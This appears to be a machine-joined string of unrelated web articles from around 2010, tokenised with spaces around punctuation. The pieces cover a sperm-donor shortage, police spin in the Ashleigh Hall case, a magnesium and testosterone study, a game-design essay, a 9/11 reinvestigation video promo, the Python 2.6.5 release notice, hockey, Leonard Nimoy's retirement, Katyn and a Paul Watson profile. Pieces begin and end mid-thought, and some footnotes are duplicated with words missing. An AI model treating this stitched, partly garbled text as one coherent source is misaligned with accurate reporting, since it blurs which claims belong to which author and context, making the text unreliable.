" All the donors stopped coming forward because they did n't want a knock on the door in 18 years time , " he said .
" I think children should have the right to know their biological parents , but it has a knock - on effect . "
The shortage has also prompted IVF clinics nationwide to get creative about attracting potential donors .
New South Wales ' largest clinic , IVF Australia , launched an online advertising campaign with tag lines such as : " You 've got millions to spare , we only need one . "
Read more about the sperm shortage at the Townsville Bulletin .
by Paul Sagar
When the Metropolitan Police shot the innocent Jean Charles de Menezes in the head , seven times , we did n’t get the truth .
We got anonymous sources briefing the media that de Menezes had run away from police , that he ’d leaped the barriers at Stockwell tube , that he ’d been wearing a heavy coat thought to be concealing a suicide bomb .
It was all spin – or as it used to be called , lies .
Luckily for the police it distracted the press for a long time – at least until an inquest was finally able to white - wash the case .
When a Met officer struck newspaper vendor Ian Tomlinson with a baton and pushed him to the ground without provocation , we did n’t get the truth .
After Tomlinson collapsed and died , the police briefed the media that Tomlinson was a rowdy protestor , that he suffered a heart attack , and that G20 protestors pelted an ambulance with bottles as it struggled to reach the dying man .
It was all lies – but almost all the MSM swallowed it , at least until The Guardian obtained damaging video evidence to the contrary .
So we know that the police lie when they mess up .
By now , you ’d hope the media would be alive to their tricks .
Sadly not .
Take the tragic case of Ashleigh Hall , who was groomed by a convicted double - rapist via Facebook .
The facts as we understand them are that Peter Chapman posed as a 19 year old , using fake photos , and over a period of months lulled Hall into trusting him , before convincing her to meet him .
When she did , he raped and murdered her .
This story is a tragedy – but it ’s also a scandal .
It ’s a scandal because Chapman was on the sex offenders register , a known dangerous criminal – but Merseyside Police lost track of him from January 2009 , 9 months before he killed Hall , and only putting out a nation - wide alert for his person a month before he struck .
After Chapman was sentenced to 35 years , Merseyside Police decided to refer itself to the Independent Police Complaints Commission .
The IPCC said they were “ disappointed ” the referral had n’t come earlier .
And that ’s when the police spin doctors came out to play .
Anybody who ’s been following this case will know that suddenly it ’s the security of Facebook – not the failures of Merseyside Police – that have grabbed the headlines .
This follows criticisms by the police that Facebook does not carry a Child Exploitation and Online Protection ( CEOP ) button – a link children can hit if they fear they are being groomed by a paedophile or otherwise threatened .
Yet it seems overwhelmingly obvious that in this case , a CEOP button would have made zero difference .
If Hall had thought that she was in danger she would n’t have gone to meet Chapman .
She ’d never have hit a CEOP button , because she did n’t think she was in danger .
But if you look at the main news reporting on the issue , the row over whether Facebook is not taking the safety of its users seriously dominates .
No surprises that the gutter press is running with the scare - story about Facebook ( Fbookphobia is a favourite of the Mail , because it gives you cancer after all ) .
Yet the so - called “ quality ” press in most cases is no better .
Here ’s the BBC , The Guardian ( twice ) , The Independent and The Telegraph ( briefly ) all reporting the story of the police criticising Facebook for the lack of a CEOP button .
None of these stories bothers to point out the elementary point that a CEOP button would not have saved Hall .
Yet now a silly debate has sprung up about whether Facebook is protecting its users .
Lib Dem Chris Huhne and Home Secretary Alan Johnson are trying to out - platitude each other by demanding that Facebook install a CEOP button .
In turn the media are reporting on that .
All the while , the big question – how did Merseyside Police fuck up so badly that a child ended up being raped and murdered by a man they should have had tabs on , and why have they only just referred themselves to the ( admittedly useless ) IPCC – is moving further from the spotlight .
1 - 0 to Merseyside Police .
Another indictment of the pathetic state of our mainstream media .
One gram magnesium raises testosterone level by a quarter A supplement containing a not drastically high dose of magnesium raises athletes ' testosterone level , write researchers at Selcuk University , Turkey , in Biological Trace Element Research .
If we are to believe this Turkish publication , your testosterone level rises by a quarter if you take one gram daily of magnesium and do intensive exercise .
The idea that athletes react well to magnesium supplements is not so strange .
Nutritionists estimate our magnesium requirement at 4 mg / kg / day .
Cells need magnesium to produce the energy molecules ATP and protective enzymes .
According to American surveys , seventy percent of the population does not get enough of the mineral .
This is because people no longer consume sufficient amounts of whole grains , spinach , nuts and beans – all good sources of magnesium .
Epidemiological studies of elderly people have shown that the more magnesium they consume , the greater their muscular strength .
A possible mechanism is that magnesium causes testosterone to attach itself less easily to the binding protein SHBG , and as a result the concentration of free testosterone in the blood rises .
The researchers at Selcuk University did an experiment with 30 male students aged between 18 and 22 .
Ten had a sedentary lifestyle ; twenty did taekwondo five times a week for between ninety minutes and two hours each session .
The ten sedentary students took 10 mg / kg bodyweight magnesium in the form of magnesium sulphate every day for four weeks [ Group 1 ] .
For a person weighing 100 kg that amounts to one gram of magnesium daily .
Among the martial arts practitioners , half received the same dose of magnesium [ Group 2 ] , and the other half took nothing [ Group 3 ] .
Before starting the supplementation , the researchers measured the students ' testosterone concentration in their blood .
This was done at rest [ Rbs ] and after running at high intensity until exhaustion [ Ebs ] .
After four weeks of taking the supplements , the researchers once again measured the testosterone concentration at rest [ Ras ] and after physical exhaustion [ Eas ] .
The table below shows the total testosterone values .
The lower table shows the free testosterone values .
Free testosterone is not attached to transport proteins and is therefore known to be active , which is not always the case for testosterone that is attached .
Most noticeable is the rise in the free testosterone level of Group 2 at rest : 24 percent .
In Group 3 , those who did n't take magnesium , the rise is 15 percent .
According to the researchers , the testosterone enhancing effect of magnesium is enough to improve athletes ' performance .
The same researchers have also published articles on the testosterone enhancing properties of zinc and calcium .
Source :
Biol Trace Elem Res. 2010 Mar 30 .
[ Epub ahead of print ] .
More :
Onion juice triples testosterone levels 25.02.2010
High vitamin D level = high testosterone level 01.02.2010
Three grams D- aspartic acid raises testosterone levels by forty percent 20.11.2009
Most of the games that I ’ve ever played — and I ’d venture to say most of the games we ’ve ever created — are lacking in emotional depth .
Many people have made this observation , and it ’s coming to border on cliché .
You probably do n’t want to hear it any more .
But if we want to make better games we ’ve got to try and address these clichéd complaints that keep hitting us in the face , rather than just point out how clichéd they are .
Over the last couple of months I ’ve played two games that have impressed me with their emotional landscapes , so I thought I ’d take some time to reflect on them .
One of the games I think is great , and both , I believe , are important , for what they try to be and do .
The Games in Question
The games in question are A Boy and His Blob , by WayForward Technologies , and Lucidity , by the LucasArts Workshop .
Each game offers some variation on puzzle - based , platformesque gameplay , and each presents a luscious , hand - painted graphical style , central to its charm .
Just take a look at these screenshots :
Childhood
You can tell from the screenshots that each of these games is attempting to explore the picture book world of a child , and that is one of the things I find most refreshing about them .
We have been doing guns and monsters and exploding intestines for so long , that it ’s incredibly nice to sit down at my computer or console and enter an imaginary world from days gone by .
Damnation
Of course , the screenshots will also make you nervous .
They will make you nervous because they look too nice .
Screenshots like those indicate that a lot of time and thought and effort — and thus , inevitably , money — went into each game ’s art direction .
One has to wonder what percentage of each game ’s budget was dedicated to painting pretty pictures , and what percentage was left over for little things like , oh , crafting the gameplay — the heart of the medium , and all that .
The Crux
This question of balancing audio- visual style with gameplay is what makes these games difficult to discuss in a room full of Craig Sterns .
Because I think Mr. Stern has a point when it comes to obsessing over aesthetics : it ’s possible to do .
Making a holistic judgment of a game based on a screenshot is a terrible mistake to make .
And yet I cannot escape the fact that the audio-visual components of Blob and Lucidity are the main draw the games have on me .
I love the way the games make me feel , I love the sensation of wandering through a classic children ’s picture book , I love the memories , the pleasures , and the pains they make me recollect .
And I cannot deny that most of that draw stems from each game ’s artwork and sound design , rather than it ’s mechanics of play — a thought that makes me terribly nervous .
Picture books are undeniably awesome , but we already have those ; do these games present anything unique ?
The Real Crux
Oh , but you ’ve read my reviews of Full Throttle and Photopia , [ 1 ] and you know that I ’m going to say that Blob and Lucidity are different from picture books , and that ’s the real crux of the matter .
If we ’re going to say that something ’s no better than a pretty picture , than we always , always have to ask ourselves if that ’s really true .
You could make a great picture book from either of these games , and I would read it .
But that picture book would not be the same as the game it was derived from .
It would be over more quickly , the presentation would be different ( pictures on paper that fit in my lap , versus animated images on my fairly large TV ) , and it would have its own unique chemically - gluey - inky - woody - plasticky - cardboardy - boxy smell , that video games just ca n’t pull off .
Fine then , the games are n’t quite like picture books , but they sound an awful lot like the animated films that picture books inspire .
Are they any different from those ?
Well , a film would bridge the presentation difference to a point — animated images on a TV screen , yada yada .
But in some ways we ’d only be getting further away from what these games add to the picture book experience , which is some small feeling of influence or efficacy between the pages .
In a film we see a character walk from point A to point B , and we have no direct catalyzing involvement in that occurrence ; we are only assimilating information .
[ 2 ]
In a picture book , by contrast , we see a picture of the character at point A , and then another picture of them at point B , with nothing in between : the space in the middle is filled in by our imagination , and there may even be a tiny feeling of agency as we turn the page ( the story can not go on without us physically doing so ) .
Now take a video game like A Boy and His Blob : the story may be almost as linear as a picture book ’s or a film ’s , but when the player sees Boy at point A , it is up to that player to both imagine Boy at point B , and to invoke the necessary action to actually get him there .
In this way the interactive component of the video game ( even if it is slight or derivative ) is enough to make it stand apart from its non-interactive counterparts : there is an inherent difference in the way we encounter it .
What we are left with is a feeling that yes , we have had this experience before ( of reading a great picture book , or watching an excellent children ’s animation ) , but it was not quite the same as this .
That here we are having it again , but it is somehow in a different form : there are feelings shared , and feelings new .
And for anyone who ’s ever loved a picture book , that is exactly what ’s so delightful about the experience of playing A Boy and His Blob or Lucidity .
The Real , Real Crux ?
So basically what I ’ve said so far is :
A ) These games draw me in with their aesthetic , more than with their gameplay .
B ) However , playing them is not quite the same as reading a book or watching a film .
But I ’ve completely neglected to discuss how the games actually play .
Surely there is a question of how well each game employs its interactive component , beyond simply the fact that it has said component ?
Why One Game is Great
This is where A Boy and His Blob parts company with Lucidity .
Because its gameplay actually deserves a lot more love than “ it does n’t draw me in like the aesthetic does . ”
Blob is a fine example of why gameplay should not be considered separately from a game ’s aesthetic , but rather as part of the same .
In A Boy and His Blob I am a boy with a blob , on a journey of the imagination .
I walk , I run , I jump and meander .
I call to Blob to catch up ( he has a personality , you know ) .
I traverse through various worlds inhabited by various kinds of friendly and unfriendliness , and little creatures that live in the grass .
I come up against obstacles , and I have to find a way through , because that ’s what you do when you ’re on a journey .
And of course Blob must help me , because that ’s what companions are for .
Would n’t it be cool if I could slap a hole on the ground like a sticker , so I could go where I can ’t , or make a ladder out of nothing , to climb to a high place ?
But what are blobs for , if not to transform ?
Let ’s ride a rocket through this world ; let ’s jump high on a trampoline ; let ’s make ourselves invincible inside a giant bubble !
This is how Blob plays .
The interactivity is not revolutionary , but it is well formed around the game ’s soul , and its execution is smooth , and mostly seamless , which is what it should be .
I said earlier that it is Blob ’s aesthetic , not its gameplay that keeps me coming back , but failed to note that its gameplay is part of the aesthetic I so enjoy .
It is not revolutionary , it is not overly complex , it is not brain - numbingly challenging , it is not staggeringly open - ended , it is not on the cutting edge of anything … but it does not need to be any of that to serve this particular game ’s mode of being .
Blob ’s gameplay , in short , does not draw attention to itself , over against its aesthetic , and every game should take a lesson from its example .
Because we always think of gameplay and aesthetic separately , almost in opposition to each other , it ’s easy to make the mistake of calling Blob ’s aesthetic good , but its gameplay ho -hum , when we should simply be calling its aesthetic good .
Period .
Because the game is formally unified , and its aesthetic includes its gameplay .
Why the Other is Not
For this same reason , Lucidity is a failure of a game .
Wait , did n’t I say it impressed me , before ?
I did , and it does , and I ’ll get back to that later .
But just because it impressed me , does n’t mean it ’s a good game .
Everything that Blob does right with its gameplay — namely , incorporate it as a central pillar of its aesthetic — Lucidity does wrong .
Lucidity starts out in the same place as Blob : attempting to make a “ heartwarming … and friendly game accessible by a wide audience , ” a game that draws on picture book inspiration and attempts to create a particular kind of emotional space .
And its art direction , like Blob ’s , succeeds wonderfully .
Instead of supporting the game ’s essence , though , Lucidity ’s gameplay does everything it can to tear it down .
Here we do not control the game ’s protagonist ( Sofi ) directly , as in Blob , but rather watch as she casually walks along her way from one side of each gorgeous level to the other .
A promising start , as this steady , unbreakable rhythm would seem to mesh well with the mood the game sets .
Disaster strikes with a double meaning , though , when Sofi comes upon some spikes in the road , or a canyon to pass .
Here we must help her out in the tradition of Lemmings , by placing some aid before her : a bridge , a spring , steps , or a catapult .
So far this does n’t sound like a bad premise , and it might not have been , but for the terribly frustrating and inadequate controls .
The game ’s canvas is in the hands of a tyrant grid , and dragging your mouse across it feels like fighting a battle you ’re going to lose .
And you do .
Because try as you might you will not be able to click at the right time , on the right spot , and Sofi will die again and again , and the level will start again and again , and the bile in your limbic system will rise , despite the pretty pictures and wonderful music .
Lucidity is exactly the kind of game that promotes the whole dichotomy between aesthetics and gameplay that we so badly need to get rid of .
We say , “ wow , great aesthetic , ” but , “ Gad , it plays terribly . ”
For some other games we say the opposite ( Dwarf Fortress , anyone ? ) .
While these statements are understandable , they ’re not helping us out : we ’re confusing ourselves and diluting our understanding of the medium .
Great artwork is integrated , unified , whole , and that ’s what aesthetic is all about .
That ’s what it has always been about , and if we want to talk about games in the context of established art forms , we need to understand that . [ 3 ]
With Lucidity there was the potential for a hypnotic , streamlined experience of interactive picture book bliss , but the LucasArts Workshop found a way to greatly retard it ( note that I do n’t say destroy it : the vision is still captivating enough to make me want to play the game for fifteen minutes at a time ) .
The problem with the game is that its developer ’s notion of aesthetic did not include gameplay as an inherent component .
Why Both Games Are Important ( Conclusion )
So why then , did I start this article by saying that Lucidity , as well as Blob , impressed me ?
Because it is a game about feeling , about creating an emotional landscape we ’ve rarely tried to create with our games .
Because the LucasArts Workshop , when they set out to make Lucidity , set out to make a game that captured a mood , a style , an evasive kind of charm — rather than a game of challenge , or strategy , or sport .
They may have had an inadequate conception of what aesthetic means for games , and they may have failed to achieve what they were aiming for , but the aim itself is important .
Do not misread me as saying that games of challenge , strategy , or sport are unimportant , or even less important than games that seek to explore an emotional space ( my last article was on the greatness of Civ , for crying out loud ) .
But we ’ve done well at creating those former kinds of games , and poorly at creating the later .
Which is why one of the great challenges facing us today in the world of game design is finding ways to open up the emotional spaces explored by our games ; and the first step towards facing that challenge is trying to face it .
Most games made today , just like the arcade classics of yore , are about challenge / skill , first and foremost .
Oh , we ’ve gotten a lot better at incorporating popular themes , and broadening the types of challenges we throw at players to accommodate a wide range of people — but in terms of emotional landscape , most of our games are still very shallow , and still very limited in what they explore .
Think of a game you enjoy , and ask yourself , why do I play that game ?
I think most of us can agree with Yan Zhang when he says in his Exit Fate article that , “ I personally justify playing most games because they exercise some skill , be it reflexes , tactical thinking , or pattern recognition .
As I am both easily amused and easily pleased , this is enough reason for me to pour entire days of my life into Garou : Rise of the Wolves or Rise of Nations , much like we would justify playing chess , poker , or baseball . ”
Which , as I ’ve already said , is great .
But we also need games to play for other reasons : in order to feel a certain way , to find a certain truth , to understand ourselves better .
I want games that exercise my reflexes and tactical thinking , but like Chris Crawford , I also want games about the mature love of a husband and wife of decades , games about a man facing truth on a dusty street at high noon , games about a prostitute with a heart of gold .
And not just games about those things , but games that embody those things in meaningful ways .
Offerings like A Boy and His Blob and Lucidity , which set out to make something heartwarming , accessible , and centered on emotional landscape and mood , are baby steps towards that goal , and that ’s what makes them important .
They are not the first games that have set out to explore emotion , mood , and aesthetic over against strategy , skill , or point scoring ; nor are they about those first things to the exclusion of the others .
But they ’ve impressed me with their vision , and with what they ’ve managed to achieve — Lucidity ’s failures notwithstanding .
They are rare examples of games I sit down to play , and enjoy , for reasons that do n’t involve “ getting better ” at anything , or shooting time in the head .
I play them for their emotional landscapes , for their beauty , their innocence , the way they make me feel .
That may be a baby step , but we ’re babies , and that ’s something .
[ 1 ] I take great pains to flatter myself .
react to what we see , and may experience various emotions in response to the move from point A to point B , but we are n’t involved in the actual movement itself .
We are reacting to , but not invoking what we see . [ 2 ]
Of course weto what we see , and may experience various emotions in response to the move from point A to point B , but we are n’t involved in the actual movement itself .
We are , but notwhat we see . [ 3 ]
PS : I personally think that Dwarf Fortress is a wonderfully integrated piece of art , but I ’ll have to defend that view at another time . :
I personally think thatis a wonderfully integrated piece of art , but I ’ll have to defend that view at another time .
Jordan Magnuson is the founder and editor in chief of NecessaryGames.com .
He recently traveled around the world on a shoestring budget with the goal of making small games about the experience .
You can find out more at GameTrekking.com .
Resources
As some of you undoubtedly know , A Boy and His Blob is actually a remake of a game from 1989 called A Boy and His Blob : Trouble on Blobolonia .
I 've played the original a bit , and it is wonderful , though as Michael Abbott noted it tends to remind one " how punishing many of those old games could be , and often needlessly so . "
In any case , the game is available from various abandonware sites , for DOS and NES , which you should take advantage of , as it is no longer possible to purchase it new ( as far as I know ) .
Further Reading A nice piece comparing the original Blob with Fumito Ueda 's games at The Pretentious Gamer .
A review of the original Blob by Anna Anthropy .
A little piece on A Boy and His Blob by Michael Abbott .
A little review of Lucidity at Giant Bomb .
Know of any relevant " further reading " links not listed here ?
Please let me know
On the 8th of March 2010 Cynthia Mckinney ( a former US Congresswoman and 2008 Green Party Presidential nominee ) and Dr Nafeez Ahmed ( best selling author and political scientist ) address a meeting of Members of Parliament on the subject of the need for an independent investigation into the events of September 11th 2001 .
PART 1
PART 2
PART 3
www.nosmokewithoutfire.co.uk
brought to you by Dead Dean films join us on facebook
http://www.facebook.com/#!/group.php?gid=195220837205&ref=ts
or http://www.youtube.com/dpuck
Cynthia Mckinney www.allthingscynthiamckinney.com
Dr Nafeez Ahmed
http://nafeez.blogspot.com
http://iprd.org.uk
They spoke at the invitation of http://Reinvestigate911.org
Hope you enjoy and spread about
Dean Puckett
[ Python - Dev ] RELEASED Python 2.6.5
On behalf of the Python community , I 'm happy to announce the availability of Python 2.6.5 final .
This is the latest production - ready version in the Python 2.6 series .
Python 2.6.5 fixes dozens of issues in the core , built - in modules , libraries , and documentation since Python 2.6.4 was released back in October 2009 .
We highly recommend that you upgrade to Python 2.6.5 .
Please see the NEWS file for all the gory details .
http://www.python.org/download/releases/2.6.5/NEWS.txt
Source tarballs and the Windows installers can be downloaded from the Python 2.6.5 page .
The Mac OS X disk image will be uploaded soon .
http://www.python.org/download/releases/2.6.5/
For more information on Python 2.6 in general , please see http://docs.python.org/whatsnew/2.6.html
Please report bugs for any Python version in the Python tracker .
http://bugs.python.org
Enjoy , - Barry Barry Warsaw barry at python.org Python 2.6 Release Manager ( on behalf of the entire python - dev team ) -------------- next part
--------------
A non-text attachment was scrubbed ...
Name : signature.asc
Type : application / pgp-signature Size : 836 bytes Desc : not available URL : < http://mail.python.org/pipermail/python-dev/attachments/20100319/1f244f4d/attachment.pgp>
For all of those wringing their hands like some sort of maniacal fiend in anticipation for Left 4 Dead 2's DLC , " The Passing , " you 're going to have to wring a little longer than you had hoped .
A recent video for U.K. Xbox Live subscribers ( above ) laid out the sad truth : you will not be seeing " The Passing " by March 31 as you originally hoped .
Instead the show goes with the ever depressing move of using a season as a release window by saying " The Passing " will be released in spring .
On a more exciting note , the broadcast does reveal that the DLC will cost 560 Microsoft Points , and reconfirms all the cool new content we already told you about .
There you have it .
No golf clubs or Witch Brides until April or even May .
Delayed zombie killing is sad .
Left 4 Dead 2 DLC Wo n't Release This Month , Will Cost 560 MS Points [ Kotaku ]
The depth and breadth of hockey ’s place in Canadian culture can be hard to fathom beyond the borders .
But it now might be heard , echoing from the north , thanks to a 3 - 2 overtime victory over the United States in the final event of the 2010 Winter Olympics .
To hear Canadians tell it , the hockey gold medal has come home , where it belongs .
Canada did not win as many medals as it had hoped at these Olympics , which closed on Sunday night , but it won more golds ( 14 ) than any country in history .
The last , an emphatic exclamation point on the 2010 Vancouver Games , will be collectively cherished more than any other .
This , after all , is a country whose $ 5 bill has a scene of children playing hockey on a pond , with a quotation from the short story “ The Hockey Sweater , ” by Roch Carrier :
Image Kenneth Toews , center , and other fans a moment after Sidney Crosby 's goal gave Canada the gold .
Credit ... Andrew Burton for The New York Times
“ The winters of my childhood were long , long seasons .
We lived in three places  the school , the church and the skating rink  but our real life was on the skating rink . ”
Hockey , the Canadian poet Richard Harrison once said , “ is the national id . ”
Father Dion did not blanch at the suggestion that hockey is religion in Canada .
Rather , he detailed the natural congruencies : both are ingrained from a young age , passed among generations , studied and practiced reverently and  in the case of the Catholic parish , at least  have a box where sinners sit in penance .
Leonard Nimoy said that he shed some tears while watching the new " Star Trek " movie , where he reprises his role as an older Spock who enlightens his younger self .
This story was updated at 5:43 p.m. ET .
Leonard Nimoy , the actor who has famously portrayed " Star Trek 's " original alien Spock for over 40 years , has announced he 's officially hanging up the pointy Vulcan ears for good .
Nimoy , 79 , plans to retire shortly from show business and the " Star Trek " convention circuit , according to the Canadian newspaper Toronto Sun .
The actor , director and photographer will be attending the Calgary Comic and Entertainment Expo this weekend , and told the paper that beyond this event he only has a few more public appearances scheduled .
Nimoy also currently guest stars on the television show " Fringe , " produced by J.J , Abrams who directed last summer 's re-launched " Star Trek " film franchise chronicling a younger original series cast on their first mission on the starship Enterprise .
The retirement announcement all but guarantees that an elder , " from - the - future " Spock ( at least played by Nimoy ) will not make an appearance in the next " Star Trek " movie .
" I want to get off the stage .
Also , I do n't think it would be fair to Zachary Quinto , " Nimoy told the Toronto Sun , referring to the actor who portrays young Spock in the new Trek film .
" He 's a terrific actor , he looks the part , and it 's time to give him some space .
And I 'm very flattered the character will continue . "
Boldly going from Boston to the bridge
Nimoy , born in Boston , Mass . in 1931 , began his acting career at the age of 20 , taking on roles in a number of campy science fiction films .
In the early and mid-1960s , he appeared in episodes of major series including " Bonanza , " " Perry Mason " and " Get Smart " in 1966 .
Also in that year , Nimoy landed a role in a new series created by Gene Roddenberry called " Star Trek . "
Nimoy played Commander Spock , the half - human , half - Vulcan first mate and science officer aboard the U.S.S. Enterprise , helmed by Captain James T. Kirk , played by William Shatner .
Nimoy donned fake , pointy , elvish ears , some swooping eyebrows , an early - Beatles hairdo , and a poker face to play the character .
Spock — for the most part — maintained a stoic demeanor per his Vulcan ancestry and his green - tinted blood ran cool in his veins .
But this uber - " logical " side of Spock occasionally struggled with his more emotional half and was torn at times between the two cultures .
" Star Trek " ran until 1969 and despite low ratings the show garnered a cult - like following on syndication in the years ahead .
Nimoy , for his part , went on to star in a number of made - for - television movies and theatrical productions in the 1970s , his Star Trek days apparently behind him .
But when studio executives green - lit a proposed new television series instead as a feature film with the original crew , Nimoy found himself back in his Starfleet uniform .
A career at warp speed
The character of Spock would continue his journey in all six original series movies , as well as episodes of " Star Trek : The Next Generation " episodes in 1991 , and then in an alternate timeline established in last summer 's Abrams - directed flick .
Nimoy also lent his voice to Trek - themed video games and other products over the years , adding to the legend of his character .
Nimoy also directed the third and fourth " Star Trek " movies , the latter of which , 1986's " ' Star Trek IV : The Voyage Home , " has been roundly received by audiences and critics alike as perhaps the best
Trek film of all for its humor and , oddly enough , humanity .
( The plot involved time - traveling back to late 20th century Earth to bring humpback whales , extinct in the future , to the 23rd century when " Star Trek " takes place to answer the calls of a devastating alien probe seeking the intelligent makers of whale song whispers heard across space eons before . )
" I felt like ' Star Trek IV ' was my personal statement on ' Star Trek , ' " Nimoy told the Toronto Sun .
In two autobiographies , 1975 's " I Am Not Spock , " followed by 1995 's " I Am Spock , " Nimoy shared his coming - to - grips of being constantly associated with his famous Star Trek character .
In addition to this work , Nimoy has also made musical recordings and done voiceovers for documentaries and as Spock and himself in cartoons such as " The Simpsons " and " Futurama , " and of course " Star Trek : The Animated Series " in the 1970s .
" Live long and prosper "
Among his many memorable on - screen moments as Spock , Nimoy came up with the now - iconic , V - shaped hand gesture often accompanied by the Vulcan axiom " live long and prosper , " both inspired by his Jewish heritage .
The albeit - less - friendly Vulcan nerve pinch — an incapacitating touch to a neck but more civilized than one of Kirk 's wildly exaggerated - for - TV haymaker punches — was also an on - set invention by Nimoy for his character .
Overall , Nimoy 's retirement is sure to leave a hole in many " Star Trek " fans and others ' hearts .
But when pushing octogenarian - hood , retiring — as Spock himself might say — perhaps is the only logical thing to do .
One of the documents made public is a note from Lavrenty Beria , the head of the NKVD , to Stalin about the fate of the Poles .
The Poles included military officers , priests , writers , professors and aristocrats .
In the note , Beria proposes that the NKVD " quickly examine the use of the highest means of punishment – death by shooting . "
Stalin 's signature and a red stamp reading " Top Secret " are on the first page of the document , which is dated March 1940 .
Another document , a secret internal Soviet Communist party memo from 1965 , refers to " what was formerly Bourgeois Poland " and warns against any public disclosure , arguing that the documents have no historical value .
Increasingly common ads and catalogues featuring plus - size models are unlikely to work on their intended customers .
That ’s according to a new study by researchers at ASU , the University of Cologne in Germany and Erasmus University in the Netherlands , which demonstrates a link between model sizes in advertisements and the self - esteem of consumers looking at the ads .
“ We believe it is unlikely that many brands will gain market share by using heavy models in their ads , ” said Naomi Mandel , marketing associate professor in the W. P. Carey School of Business at ASU .
“ We found that overweight consumers demonstrated lower self - esteem – and therefore probably less enthusiasm about buying products – after exposure to any size models in ads ( versus ads with no models ) .
Also , normal - weight consumers experienced lower self - esteem after exposure to moderately heavy models , such as those in Dove soap ’s ‘ Real Women ’ campaign , than after exposure to moderately thin models . ”
Download Full Image
Mandel and her colleagues performed a series of experiments based on the popular idea that looking at extremely thin models can negatively affect consumers ’ self - esteem and possibly even lead to eating disorders in young girls .
That belief is why fashion show organizers in Milan , Italy and Madrid , Spain , recently banned super waif models from their catwalks .
In the new study , researchers took the link between model size and self - esteem even further by factoring in the consumers ’ own body size and self - esteem before looking at the ads .
Although they did confirm that exposure to extremely thin models can be damaging to most women ’s self - esteem , they also found some surprising effects .
“ We show it is not just the size of the models in the ads , but also the relative distance between the consumer ’s size and the model ’s size that affects self - esteem , ” Mandel said .
In the experiments , hundreds of female students were categorized as having low , normal or high body mass index ( BMI ) based on their heights and weights .
They were then invited to a lab , but were not told the true nature of the study .
They were shown a variety of ads and told to answer several questions , only some of which were truly related to the study .
The questionnaires showed the participants ’ self - esteem shifted based on the model sizes they saw in the ads and whether they considered themselves to be similar to or different from those sizes .
Low - BMI , thinner women tended to experience a boost in self - esteem when they viewed all models because they identified positively with the thinner models and saw themselves as different from the heavier models .
Higher - BMI , heavier women dropped in self - esteem when looking at all models because they saw themselves as different from the thinner , idealized ones and similar to the overweight models .
Normal - BMI women had the most shifts in self - esteem , depending on what types of images they saw and could therefore be the most influenced by pictures in ads .
For example , if they viewed a moderately thin model , they felt similar and good ; if they saw a moderately heavy model , they worried they were similar and overweight .
These findings could be used to prompt changes in behavior .
For example , if a normal - size woman sees moderately heavy images in ads for weight - loss products , she might feel overweight and be more inclined to buy a diet plan or gym membership .
The same premise could apply to using heavy images in public service announcements aimed at fighting the obesity epidemic .
Dirk Smeesters , marketing associate professor of Erasmus University , and Thomas Mussweiler , social psychology professor of the University of Cologne , worked with Mandel on the study , which will be published in April ’s Journal of Consumer Research .
April 21 , 2010 - L4D Team
The Passing introduces a series of weekly game mode events dubbed " Mutations . "
These are week - long runs of new gameplay modes that range from " Realism Versus " to " Chainsaw Massacre " .
Each week one new Mutation is featured and the previous Mutation retired .
Every Thursday the new in - game blog will let you know of the upcoming Mutation .
Once a month we will have a poll to vote on your favorite Mutation .
The winning Mutation will return the following week .
Our first Mutation is Realism Versus .
For this Mutation , Survivors have all the Realism changes working against them , no glows on items or survivors , tougher zombies , instant kill witches , etc .
The Infected have all those changes working for them .
This makes the Jockey one of the most powerful Specials for his ability to steer a Survivor out of view .
You will want to make sure you have a working microphone so your teammates can hear your screams for help .
This Mutation is only available in Versus .
Another example of an upcoming Mutation is Chainsaw Massacre .
You are armed with the only thing you need to survive a Zombie Apocalypse : a chainsaw with unlimited gas .
Rip apart thousands of zombies on your way to safety .
This Mutation will be available later and only in Campaign Mode .
To learn about the other Mutations , you will have to check the in - game blog each week .
What we can tell you now is the Mutations will cover different game modes and be available across all Campaigns .
To give us feedback on the individual Mutations and Mutations in general visit the Left 4 Dead 2 forums at forums .
l4d.com
Force Fields is a simple but addictive physics simulation of a gravity system .
There is no goal , just play around and see how the particles interact with each other and the force fields !
---
There are three different modes available :
- Force fields : touching anywhere on the screen adds a force field and from the menu option you can add up to 10 particles .
- Particles : touching around the screen generates a stream of cool sparkles ;
- Rubber band : you can control a particle with a virtual rubber band tied to your finger .
On the top left corner you can find the time controls , where you can adjust the speed of the simulation giving you a better idea about what 's happening .
There are tons of options : you can enable gravity and control the particles with the accelerometer sensors of your device , set a custom background image , configure colors and shape of the force fields , the particles and the trails they left ... and much much more !
---
The Force Fields Live Wallpaper version is available for FREE for Android 2.1 devices or higher !
[ internet access required for ads ]
---
i Phone related for Force Fields
Force Fields was developed for Android by Paolo Zuliani
Package name : com.forcefields
System permissions : 2
Click here to show / hide list
android.permission.VIBRATE
android.permission.INTERNET
I am the developer of this Application !
was developed for Android byPackage name : System permissions :
Screenshot (s ) available for Force Fields
Discussion(s ) about Force Fields in our forum
Comments and Ratings for Force Fields
All 5 stars 4 stars 3 stars 2 stars 1 star
Filters :
Watson is nothing if not a man of action .
This was witnessed by Australians in January when Watson 's skirmish with Japanese whalers in the Southern Ocean resulted in his stealth boat , the Ady Gil , being destroyed .
While Sea Shepherd and its president have only become well known in Australia for their campaign against Japanese whaling , the 59 - year - old Canadian has been putting himself between hunters and their prey for 40 years .
Having worked with animals for so long , Watson seems to harbour a degree of mistrust for humans .
" I happen to think that whales are more intelligent than people , " he says .
" Certainly their languages are more complex and their communication skills are more complex .
" I think there 's a lot for us to learn .
It 's kind of like us going to another planet , finding another intelligent life form and killing them for oil . "
Watson certainly seems tired of all the focus on human activities .
To him , we 're just another species among the millions on Earth .
It 's his belief that the world is already massively overpopulated and he openly advocates reducing the world 's population to 1 billion by people voluntarily having fewer children .
When speaking with Watson you can sense his frustration , directed not only at those he campaigns against but also against those who are n't willing to adopt his hard - line approach .
That 's why he reserves some of his most stinging barbs for other environmental groups .
Sea Shepherd 's conservation work has earned the organisation , and Watson , many celebrity admirers .
When he was attacked in his hotel room in 1995 , Watson was staying with Martin Sheen .
Other supporters include Pierce Brosnan , Sean Penn and Daryl Hannah .
But despite the Hollywood support he receives , and the glare of the media limelight , it 's clear that Watson is more at home at sea than anywhere else .
" It 's a total sense of freedom .
You 're out beyond the bounds of government control and you 're one with nature , really , " he says .
It 's kind of like us going to another planet , finding another intelligent life form and killing them for oil .
Watson 's affinity with the ocean began at the age of six when his family moved to St Andrews , a colonial resort town on Canada 's east coast .
Watson , the eldest of seven , was born in Toronto in 1950 .
When his mother , Annamarie , died in childbirth just after he turned 13 , he was left under the care of his physically abusive father .
" He was very abusive , so when I was 15 I just turned and defended myself and then left home .
I think it was a very liberating thing to do .
